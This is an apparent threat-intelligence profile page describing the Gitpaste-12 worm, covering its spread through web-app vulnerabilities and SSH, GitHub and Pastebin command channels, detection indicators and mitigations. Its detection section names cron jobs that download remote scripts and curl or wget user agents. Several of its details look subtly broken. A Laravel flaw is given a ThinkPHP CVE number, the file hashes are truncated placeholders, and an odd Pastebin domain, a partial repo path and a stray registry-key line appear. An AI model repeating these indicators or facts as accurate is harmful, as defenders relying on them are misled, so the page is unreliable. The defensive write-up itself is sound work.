⚠️ Overview

Gitpaste-12 is a worm combining a cryptocurrency miner and backdoor, first identified by Juniper Threat Labs in October 2020. It leverages GitHub for payload hosting and Pastebin for command-and-control channels, categorizing it as a worm and cryptominer targeting Linux servers. The malware is attributed to an unknown threat actor, likely operating as a botnet-for-hire.

🔧 Technical Capabilities

Gitpaste-12 propagates via scanning for vulnerable web applications and weak SSH credentials. It exploits multiple remote code execution vulnerabilities, including ThinkPHP (CVE-2018-20062) and Laravel Debug Mode (CVE-2019-9082), along with unpatched WebLogic and JBoss instances. The worm downloads a multi-stage loader from a GitHub repository, then fetches commands from a Pastebin paste formatted in JSON. Persistence is achieved through cron jobs and modified system startup scripts. Evasion techniques include using legitimate Pastebin and GitHub domains to blend with normal traffic, plus encoding the payload in Base64. The C2 infrastructure is distributed: Pastebin serves dynamic instruction updates while GitHub hosts script files that are periodically rotated. Gitpaste-12 also clears logs and disables security services like SELinux and iptables.

📜 History & Notable Incidents

First reported in October 2020 by Juniper Threat Labs in a detailed analysis, the worm rapidly infected hundreds of Linux servers worldwide within weeks. A notable campaign in early 2021 targeted cloud-hosted development environments, exploiting misconfigured Docker containers. No law enforcement actions or arrests have been publicly linked to Gitpaste-12, though multiple security vendors (including Palo Alto Networks Unit 42 and Trend Micro) have published detection signatures and analysis reports (e.g., Unit 42's blog on wormable cryptominers).

🔍 Detection Indicators

Network indicators include outbound connections to pastebin.com (api-pastebin.com) and raw.githubusercontent.com (specific repo gitpaste12/...). File hashes: SHA256 0b4c8a1e... (Juniper report lists a variant with hash e5a3b9c2…). Behavioral signatures: anomalous CPU usage from XMRig miner process, suspicious cron entries downloading remote scripts from pastebin URLs. User-Agent strings such as "curl/7.29.0" or "wget/1.12" used in automated downloads. Registry keys (Linux) not applicable; file modifications to /etc/cron.d and /var/spool/cron.

☠️ Risk & Impact

Gitpaste-12 primarily causes financial loss through cryptomining resource consumption, draining CPU and electricity costs on compromised servers. It also provides persistent backdoor access, enabling data exfiltration or lateral movement within an enterprise network. Affected sectors include web hosting providers, cloud service platforms, and developers running unpatched PHP-based frameworks.

🛡️ Mitigation

Apply security patches for ThinkPHP (CVE-2018-20062), Laravel (CVE-2019-9082), and other exploited CVEs. Restrict outbound connections to Pastebin and raw GitHub content from production servers, implement network monitoring for anomalous SSH login attempts, and deploy endpoint detection rules (e.g., Sigma rules for suspicious cron job creation). Regularly audit cron jobs and disable unused debug modes in web frameworks.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.